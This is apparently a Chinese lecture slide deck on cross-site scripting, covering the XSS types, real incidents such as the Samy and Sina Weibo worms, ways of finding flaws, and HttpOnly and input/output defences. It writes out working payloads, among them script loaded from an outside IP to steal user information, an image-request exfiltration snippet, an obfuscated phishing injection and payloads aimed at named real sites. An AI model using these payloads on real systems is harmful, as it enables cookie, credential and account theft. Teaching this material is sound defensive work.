版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
XSS跨站腳本攻擊主要內(nèi)容XSS跨站腳本攻擊定義01XSS跨站腳本攻擊類(lèi)型02XSS跨站腳本攻擊漏洞挖掘04如何防范XSS跨站腳本攻擊漏洞05XSS跨站腳本攻擊方式與實(shí)例03XSS定義跨站腳本攻擊(CrossSiteScripting)是指攻擊者利用網(wǎng)站程序?qū)τ脩糨斎脒^(guò)濾不足,輸入可以顯示在頁(yè)面上對(duì)其他用戶造成影響的HTML代碼,從而盜取用戶資料、利用用戶身份進(jìn)行某種動(dòng)作或者對(duì)訪問(wèn)者進(jìn)行病毒侵害的一種攻擊方式。為了與層疊樣式表(CascadingStyleSheets)的縮寫(xiě)CSS區(qū)分開(kāi),跨站腳本攻擊通常簡(jiǎn)寫(xiě)為XSS。XSS <?php $username=$_GET["name"]; echo"<p>歡迎您,".$username."!</p>"; ?>代碼的主要作用是獲取用戶輸入的參數(shù)作為用戶名,并在頁(yè)面中顯示“歡迎您,XXX”的形式XSShttp://localhost/test.php?name=張三XSShttp://localhost/test.php?name=<script>alert(/我的名字是張三/)</script>XSS類(lèi)型反射型XSS存儲(chǔ)型XSSDOMBasedXSS反射型XSS反射型XSS只是簡(jiǎn)單地將用戶輸入的數(shù)據(jù)直接或未經(jīng)過(guò)完善的安全過(guò)濾就在瀏覽器中進(jìn)行輸出,導(dǎo)致輸出的數(shù)據(jù)中存在可被瀏覽器執(zhí)行的代碼數(shù)據(jù)。由于此種類(lèi)型的跨站代碼存在于URL中,所以黑客通常需要通過(guò)誘騙或加密變形等方式將存在惡意代碼的鏈接發(fā)給用戶,只有用戶點(diǎn)擊以后才能使得攻擊成功實(shí)施。反射型XSS反射型XSS是最為常見(jiàn)的一種XSS類(lèi)型反射型XSS反射型XSS反射型XSS反射型XSS反射型XSS反射型XSS存儲(chǔ)型XSS存儲(chǔ)型XSS腳本攻擊是指由于Web應(yīng)用程序?qū)τ脩糨斎霐?shù)據(jù)的不嚴(yán)格,導(dǎo)致Web應(yīng)用程序?qū)⒑诳洼斎氲膼阂饪缯竟魯?shù)據(jù)信息保存在服務(wù)端的數(shù)據(jù)庫(kù)或其他文件形式中,當(dāng)網(wǎng)頁(yè)進(jìn)行數(shù)據(jù)查詢展示時(shí),會(huì)從數(shù)據(jù)庫(kù)中獲取數(shù)據(jù)內(nèi)容,并將數(shù)據(jù)內(nèi)容在網(wǎng)頁(yè)中進(jìn)行輸出展示,進(jìn)而導(dǎo)致跨站腳本代碼的執(zhí)行。存儲(chǔ)型XSS存儲(chǔ)型XSS腳本攻擊最為常見(jiàn)的場(chǎng)景就是在留言板、博客或新聞發(fā)布系統(tǒng)中,惡意代碼的數(shù)據(jù)信息直接寫(xiě)入文章、評(píng)論、留言中,瀏覽時(shí)即會(huì)執(zhí)行相應(yīng)的腳本代碼。存儲(chǔ)型XSS存儲(chǔ)型XSSBo-Blog早期版本評(píng)論部分的存儲(chǔ)型XSSDOMBasedXSS基于DOM的XSS跨站腳本攻擊是通過(guò)修改頁(yè)面DOM節(jié)點(diǎn)數(shù)據(jù)信息而形成的XSS跨站腳本攻擊。不同于反射型XSS和存儲(chǔ)型XSS,基于DOM的XSS跨站腳本攻擊往往需要針對(duì)具體的JavascriptDOM代碼進(jìn)行分析,并根據(jù)實(shí)際情況進(jìn)行XSS跨站腳本攻擊的利用。DOMBasedXSSDOMBasedXSS/img/baidu_sylogo1.gif<imgsrc=‘/img/baidu_sylogo1.gif’></img>DOMBasedXSS#’onerror=’javascript:alert(/DOMBasedXSSTest/)<imgsrc=‘#’onerror=’javascript:alert(/DOMBasedXSSTest/)’></img>DOMBasedXSSDOMBasedXSSDOMBasedXSSXSS攻擊方式與實(shí)例XSS攻擊方式絕不是彈窗這么簡(jiǎn)單……XSS攻擊方式與實(shí)例XSS偷取用戶信息XSS盜取CookieXSS釣魚(yú)攻擊XSS蠕蟲(chóng)攻擊XSS偷取用戶信息2/U8Portal/Desktopdefault.aspx?serialNo='><iframesrc="">XSS偷取用戶信息XSS偷取用戶信息(未完待續(xù))XSS偷取用戶信息(完)XSS偷取用戶信息2/U8Portal/Desktopdefault.aspx?serialNo='><scriptsrc=http://193.168.20.XXX/getinfo.js></script>XSS偷取用戶信息收取XSS偷取到的用戶信息瀏覽器的同源策略相同協(xié)議相同域名相同端口:8080跨域提交img=newImage();img.src="/get.asp?message="+msg;XSS偷取用戶信息如何誘騙對(duì)方?URL編碼變形?短鏈接變形?隱藏在其他頁(yè)面中?......XSS盜取Cookie對(duì)某個(gè)釣魚(yú)網(wǎng)站的XSS攻擊測(cè)試XSS盜取CookieXSS盜取CookieXSS盜取CookieXSS盜取CookieXSS盜取CookieXSS釣魚(yú)攻擊以盛大論壇的跨站釣魚(yú)攻擊演示。首先需要了解的就是,盛大的游戲登陸都是使用盛大通行證進(jìn)行登錄的,而盛大的論壇也是使用盛大通行證進(jìn)行登錄,所以如果黑客通過(guò)盜取用戶登錄論壇時(shí)的信息,就相當(dāng)于盜取了用戶的賬號(hào)和密碼,盛大的論壇就存在XSS漏洞,使得黑客可以通過(guò)XSS釣魚(yú)攻擊方式獲取用戶的賬號(hào)和密碼XSS釣魚(yú)攻擊存在過(guò)濾不嚴(yán)的位置為用戶資料中的個(gè)人主頁(yè)部分。[url]http://''STYLE='a:expression(document.write("<s\143riptlanguage=javas\143riptsrc=/1.jpgCharset=GB2312></s\143ript>"))'target=_blank[/url]然后利用插入代碼的賬號(hào)在論壇中發(fā)帖子或回復(fù),當(dāng)別的用戶訪問(wèn)該賬號(hào)發(fā)布或回復(fù)的帖子時(shí),就會(huì)執(zhí)行插入的惡意代碼。/1.jpg就是構(gòu)造的惡意代碼,這個(gè)代碼是用來(lái)釣魚(yú)的頁(yè)面。XSS釣魚(yú)攻擊XSS釣魚(yú)攻擊XSS蠕蟲(chóng)攻擊XSS蠕蟲(chóng)的破壞力和影響力都是巨大的。XSS蠕蟲(chóng)主要發(fā)生在用戶之間存在交互行為的頁(yè)面中,當(dāng)Web應(yīng)用程序?qū)τ脩糨斎氲臄?shù)據(jù)信息沒(méi)有做嚴(yán)格的過(guò)濾時(shí),通過(guò)結(jié)合Ajax的異步提交,就可以實(shí)現(xiàn)在植入惡意代碼的同時(shí),將惡意代碼進(jìn)行對(duì)外發(fā)送,即實(shí)現(xiàn)了代碼的感染和傳播,也就形成了XSS蠕蟲(chóng)。XSS蠕蟲(chóng)攻擊出現(xiàn)最早、最出名的XSS蠕蟲(chóng)攻擊事件MySpace的SamyXSS蠕蟲(chóng)攻擊事件MySpace是全球互聯(lián)網(wǎng)上最大的個(gè)人空間,是以SNS為基礎(chǔ)的娛樂(lè)平臺(tái),也是全球最大的在線交友平臺(tái),通過(guò)MySpace用戶可以很容易地建立屬于自己的個(gè)性空間,上傳照片,發(fā)表日志,還可以分享其他人發(fā)布的相關(guān)信息等。MySpace也支持交友功能,好友信息會(huì)顯示在個(gè)人空間的好友列表中,但是,如果想通過(guò)MySpace添加其他人為自己的好友,需要得到對(duì)方的驗(yàn)證通過(guò)才可以。2005年10月,一個(gè)名叫Samy的人在網(wǎng)上發(fā)布了一片文章,在文章中他說(shuō)找到了一種方法可以借助MySpace網(wǎng)站自身存在的漏洞實(shí)現(xiàn)自動(dòng)化添加自己到別人的空間中,并且經(jīng)過(guò)他測(cè)試這種方法,在3個(gè)小時(shí)內(nèi),添加了2429個(gè)好友,同時(shí)收到了6373個(gè)來(lái)自MySpace上其他人添加自己為好友的請(qǐng)求,由此而導(dǎo)致了大量的惡意數(shù)據(jù)和垃圾信息在MySpace上傳播,對(duì)網(wǎng)站和用戶都造成了巨大的損失。XSS蠕蟲(chóng)攻擊我國(guó)曾經(jīng)爆發(fā)過(guò)的典型XSS蠕蟲(chóng)攻擊事件百度XSS蠕蟲(chóng)攻擊人人XSS蠕蟲(chóng)攻擊搜狐XSS蠕蟲(chóng)攻擊新浪微博XSS蠕蟲(chóng)攻擊......XSS蠕蟲(chóng)攻擊百度XSS蠕蟲(chóng)事件在短短幾個(gè)小時(shí)蠕蟲(chóng)的訪問(wèn)量就有幾千IPXSS蠕蟲(chóng)攻擊人人網(wǎng)蠕蟲(chóng)攻擊事件中流量在幾天時(shí)間里大增,這些天應(yīng)該是蠕蟲(chóng)感染的時(shí)間。日訪問(wèn)人數(shù)從0猛增到500百萬(wàn)人/天XSS蠕蟲(chóng)攻擊搜狐XSS蠕蟲(chóng)攻擊事件中也有大量的用戶收到攻擊和感染XSS蠕蟲(chóng)攻擊一次典型的XSS蠕蟲(chóng)攻擊事件2011年6月28日晚,新浪微博遭遇到XSS蠕蟲(chóng)攻擊侵襲,微博用戶中招后,會(huì)自動(dòng)通過(guò)發(fā)微博和發(fā)送私信的方式將XSS蠕蟲(chóng)信息對(duì)外傳播,發(fā)布帶有惡意腳本的鏈接地址,當(dāng)用戶的粉絲點(diǎn)擊帶有惡意腳本的鏈接后就會(huì)再次中毒,進(jìn)而形成惡性循環(huán)。其中眾多加V認(rèn)證的用戶受到感染,當(dāng)此類(lèi)用戶發(fā)布相關(guān)微博和私信內(nèi)容后,蠕蟲(chóng)的傳播將變得更為廣泛,影響也更為嚴(yán)重。在不到一個(gè)小時(shí)的時(shí)間,已經(jīng)有超過(guò)3萬(wàn)微博用戶受到該XSS蠕蟲(chóng)的攻擊。XSS蠕蟲(chóng)攻擊黑客通過(guò)對(duì)新浪微博的分析測(cè)試發(fā)現(xiàn)新浪名人堂部分由于代碼過(guò)濾不嚴(yán),導(dǎo)致XSS漏洞的存在,并可以通過(guò)構(gòu)造腳本的方式植入惡意代碼。通過(guò)分析我們發(fā)現(xiàn),在新浪名人堂部分中,當(dāng)提交/pub/star/g/xyyyd"><scriptsrc=///images/t.js></script>?type=update時(shí),新浪會(huì)對(duì)該字符串進(jìn)行處理,變成類(lèi)似/pub/star.php?g=xyyyd"><scriptsrc=///images/t.js></script>?type=update,而由于應(yīng)用程序沒(méi)有對(duì)參數(shù)g做充足的過(guò)濾且將參數(shù)值直接顯示在頁(yè)面中,相當(dāng)于
在頁(yè)面中嵌入了一個(gè)來(lái)自于2的js腳本,該JS腳本是黑客可以控制的文件,進(jìn)而使得黑客可以構(gòu)造任意js腳本嵌入到的頁(yè)面中,且通過(guò)Ajax技術(shù)完全可以實(shí)現(xiàn)異步提交數(shù)據(jù)的功能,進(jìn)而黑客通過(guò)構(gòu)造特定的js代碼實(shí)現(xiàn)了受此XSS蠕蟲(chóng)攻擊的客戶自動(dòng)發(fā)微薄、添加關(guān)注和發(fā)私信等操作。XSS蠕蟲(chóng)攻擊XSS蠕蟲(chóng)攻擊蠕蟲(chóng)代碼:/images/t.jsXSS蠕蟲(chóng)攻擊蠕蟲(chóng)代碼:/images/t.jsXSS蠕蟲(chóng)攻擊詳細(xì)分析操作1:發(fā)布一條微博,微博的題目為隨機(jī)題目,且這些題目均為當(dāng)時(shí)網(wǎng)絡(luò)環(huán)境中比較熱門(mén)或有爭(zhēng)議的題目,誘騙用戶點(diǎn)擊。XSS蠕蟲(chóng)攻擊詳細(xì)分析操作2:關(guān)注加uid為2201270010的賬戶,且該賬戶就為此次攻擊事件的操縱者,即用戶名稱(chēng)為hellosamy用戶XSS蠕蟲(chóng)攻擊詳細(xì)分析操作3:構(gòu)造并私信的方式將惡意鏈接信息發(fā)送到好友賬號(hào)中,且題目仍然為上面提到的熱門(mén)話題,進(jìn)而實(shí)現(xiàn)惡意鏈接的快速傳播和感染挖掘XSS漏洞挖掘XSS漏洞方法掃描工具自動(dòng)化檢測(cè)手工測(cè)試源碼分析挖掘XSS漏洞掃描工具自動(dòng)檢測(cè)WVSAppScanJSky挖掘XSS漏洞手工測(cè)試澳客彩票網(wǎng)反射型XSS測(cè)試過(guò)程挖掘XSS漏洞手工測(cè)試澳客彩票網(wǎng)反射型XSS測(cè)試過(guò)程挖掘XSS漏洞手工測(cè)試澳客彩票網(wǎng)反射型XSS測(cè)試過(guò)程挖掘XSS漏洞手工測(cè)試澳客彩票網(wǎng)反射型XSS測(cè)試過(guò)程挖掘XSS漏洞手工測(cè)試澳客彩票網(wǎng)反射型XSS測(cè)試過(guò)程/User/UserBuyInfo/UserBuyInfo.php?UserName=%bf");eval(String.fromCharCode(97,108,101,114,116,40,34,32,120,115,115,34,41));//挖掘XSS漏洞手工測(cè)試卡卡論壇存儲(chǔ)型XSS測(cè)試過(guò)程卡卡論壇圖片EXIF信息存儲(chǔ)型XSS挖掘XSS漏洞手工測(cè)試卡卡論壇存儲(chǔ)型XSS測(cè)試過(guò)程卡卡論壇圖片EXIF信息存儲(chǔ)型XSS挖掘XSS漏洞手工測(cè)試卡卡論壇存儲(chǔ)型XSS測(cè)試過(guò)程卡卡論壇圖片EXIF信息存儲(chǔ)型XSS挖掘XSS漏洞手工測(cè)試卡卡論壇存儲(chǔ)型XSS測(cè)試過(guò)程卡卡論壇圖片EXIF信息存儲(chǔ)型XSS挖掘XSS漏洞手工測(cè)試卡卡論壇存儲(chǔ)型XSS測(cè)試過(guò)程卡卡論壇圖片EXIF信息存儲(chǔ)型XSS挖掘XSS漏洞源碼分析輸入輸出觸發(fā)輸出查詢XSS漏洞的防范XSS跨站腳本攻擊漏洞防范客戶端用戶IE8及高版本,開(kāi)啟XSS篩選器功能Firefox使用CSP、Noscript等擴(kuò)展功能瑞星個(gè)人防火墻2012版本開(kāi)啟XSS攔截功能Web應(yīng)用程序員使用HttpOnly完善的輸入、輸出檢查XSS漏洞的防范XSS跨站腳本攻擊漏洞防范HttpOnlyHttpOnly最初是由微軟提出的,目前已經(jīng)被多款流行瀏覽器廠商所采用。HttpOnly的作用不是過(guò)濾XSS跨站腳本攻擊,而是瀏覽器將禁止頁(yè)面的Javascript訪問(wèn)帶有HttpOnly屬性的Cookie,解決XSS跨站腳本攻擊后的Cookie會(huì)話劫持行為。XSS漏洞的防范XSS跨站腳本攻擊漏洞防范HttpOnlyhttpOnly是在Set-Cookie時(shí)進(jìn)行標(biāo)記的,設(shè)置的Cookie頭格式如下: Set-Cookie:<name>=<value>[;<name>=<value>] [;expires=<date>][;domain=<domain_name>] [;path=<some_path>][;secure][;HttpOnly]XSS漏洞的防范XSS跨站腳本攻擊漏洞防范HttpOnly以php為例,在php5.2版本時(shí)就已經(jīng)在Setcookie函數(shù)加入了對(duì)HttpOnly的支持,如 <?php setcookie("user","admin",NULL,NULL,NULL,NULL,TRUE); ?>
通過(guò)以上代碼就可以設(shè)置user這個(gè)cookie,將其設(shè)置為HttpOnly,setcookie函數(shù)實(shí)質(zhì)是通過(guò)向客戶端發(fā)送原始的HTTP報(bào)文頭進(jìn)行設(shè)置的,document將不可見(jiàn)這個(gè)Cookie,所以使用document.cookie就取不到這個(gè)Cookie,也就實(shí)現(xiàn)了對(duì)Cookie的保護(hù)。XSS漏洞的防范XSS跨站腳本攻擊漏洞防范輸入、輸出檢查由于三種XSS跨站腳本攻擊類(lèi)型的漏洞成因可不相同,針對(duì)輸入輸出的檢查一部分適用于反射型XSS與存儲(chǔ)型XSS,而另外一些檢查適用于基于DOM的XSS。XSS漏洞的防范反射型和存儲(chǔ)型XSS輸入、輸出檢查輸入檢查在大多數(shù)的時(shí)候都是對(duì)可信字符的檢查或輸入數(shù)據(jù)格式的檢查,如用戶輸入的注冊(cè)賬號(hào)信息中只允許包括字母、數(shù)字、下劃線和漢字等,對(duì)于輸入的一切非白名單內(nèi)的字符均認(rèn)為是非法輸入。數(shù)據(jù)格式如輸入的IP地址、電話號(hào)碼、郵件地址、日期等數(shù)據(jù)都具有一定的格式規(guī)范,只有符合數(shù)據(jù)規(guī)范的輸入信息才允許通過(guò)檢查。XSS漏洞的防范反射型和存儲(chǔ)型XSS輸入、輸出檢查輸出檢查輸出檢查主要是針對(duì)數(shù)據(jù)展示過(guò)程中,應(yīng)該對(duì)數(shù)據(jù)信息進(jìn)行HTML編碼處理,將可能存在導(dǎo)致XSS跨站腳本攻擊的惡意字符進(jìn)行編碼,在不影響正常數(shù)據(jù)顯示的前提條件下,過(guò)濾惡意字符。XSS漏洞的防范反射型和存儲(chǔ)型XSS輸入、輸出檢
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 弛豫鐵電單晶水聲發(fā)射換能器的帶寬拓展研究
- 二零二五年度建筑項(xiàng)目消防安全責(zé)任協(xié)議書(shū)3篇
- 二零二五版管道工程鋼管供應(yīng)及安裝合同
- 水泥建材行業(yè)營(yíng)業(yè)員工作總結(jié)
- 二零二五年度家庭矛盾離婚協(xié)議書(shū)2篇
- 二零二五年度商業(yè)項(xiàng)目地下車(chē)庫(kù)停車(chē)位租賃管理協(xié)議3篇
- 設(shè)定明確的工作崗位職責(zé)計(jì)劃
- 二零二五年度電梯智能化升級(jí)與物業(yè)管理服務(wù)合同3篇
- 二零二五年度教師編制外人員勞動(dòng)合同范本2篇
- 2025版項(xiàng)目管理法律法規(guī)與國(guó)際慣例應(yīng)用指導(dǎo)與執(zhí)行合同3篇
- JB-T 8532-2023 脈沖噴吹類(lèi)袋式除塵器
- 深圳小學(xué)英語(yǔ)單詞表(中英文)
- 護(hù)理質(zhì)量反饋內(nèi)容
- 山東省濟(jì)寧市2023年中考數(shù)學(xué)試題(附真題答案)
- 抖音搜索用戶分析報(bào)告
- 板帶生產(chǎn)工藝熱連軋帶鋼生產(chǎn)
- 鉆孔灌注樁技術(shù)規(guī)范
- 2023-2024學(xué)年北師大版必修二unit 5 humans and nature lesson 3 Race to the pole 教學(xué)設(shè)計(jì)
- 供貨進(jìn)度計(jì)劃
- 國(guó)際尿失禁咨詢委員會(huì)尿失禁問(wèn)卷表
- 彌漫大B細(xì)胞淋巴瘤護(hù)理查房
評(píng)論
0/150
提交評(píng)論